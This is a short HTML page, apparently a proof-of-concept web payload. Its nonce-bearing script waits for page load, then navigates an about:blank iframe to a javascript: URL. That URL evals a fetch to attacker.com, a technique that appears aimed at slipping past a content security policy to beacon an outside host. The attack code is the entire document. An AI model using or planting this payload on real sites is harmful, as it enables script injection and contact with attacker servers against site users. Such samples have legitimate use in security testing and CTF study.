<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGUYYRFGGGGG" src="about:blank"></iframe>
<script nonce='123'>
window.onload = function() {
    GGGGGUYYRFGGGGG.addEventListener("load",()=>{GGGGGUYYRFGGGGG.contentWindow.location.href="javascript:eval('fetch(`https://attacker.com/report/report`)')";},{once:true});
};
</script>
</body>
</html>